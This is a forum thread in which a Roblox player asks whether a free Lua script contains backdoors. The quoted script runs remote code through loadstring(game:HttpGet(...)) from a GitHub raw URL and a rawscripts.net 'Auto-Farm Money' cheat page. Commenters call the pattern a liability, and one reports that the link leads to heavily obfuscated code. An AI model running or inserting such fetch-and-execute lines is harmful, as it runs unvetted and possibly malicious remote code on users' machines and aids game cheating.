#are there any backdoors in this script?

1 messages · Page 1 of 1 (latest)

hoary parcel
crude sand
#

Imo

#

Loading scripts thro loadstring

#

Defo not good sign

wicked bluff
#
-- Function to load both scripts
local function loadScripts()
    -- Load Script 1
    loadstring(game:HttpGet("https://raw.githubusercontent.com/Nate7953/Bl/refs/heads/main/Script.lua"))()
    
    -- Load Script 2
    loadstring(game:HttpGet("https://rawscripts.net/raw/BlockSpin-OMEGA!!-Auto-Farm-Money-with-ATMs-and-Steak-House-35509"))()
end

-- Call the loadScripts function immediately when the game starts
loadScripts()```
bruh
#

hard to tell if they're actual backdoors but, idk, you get what you pay for 🤷

hoary parcel
#

tytsm guys

wicked bluff
#

the fact it's not obfuscated and are at the very top of the script, so they're not hidden in any way, suggests they aren't, but yea.... free is free

hoary parcel
wicked bluff
#

bear in mind that code can be changed by its author at any time

hoary parcel
#

its dangerous i think

wicked bluff
#

idk if dangerous is the right word... liability is more fitting i think

#

nothing stopping you just taking the code from those links and putting them in modulescripts instead of relying on loadstring

hoary parcel
#

sadly im a noob at scripting thats scared to get a virus on his PC

#

🤓

idle vault
#

Secret technic to know if a script is malicious (works 100% every times ):
make your own lol

gritty radish
#

If you feel wrong about something then don't do it

#

Just learn scripting

somber mountain
#

This link leads to another http fetch which loads into a heavily obfuscated script which at the moment I am trying to deobfuscate

"https://rawscripts.net/raw/BlockSpin-OMEGA!!-Auto-Farm-Money-with-ATMs-and-Steak-House-35509"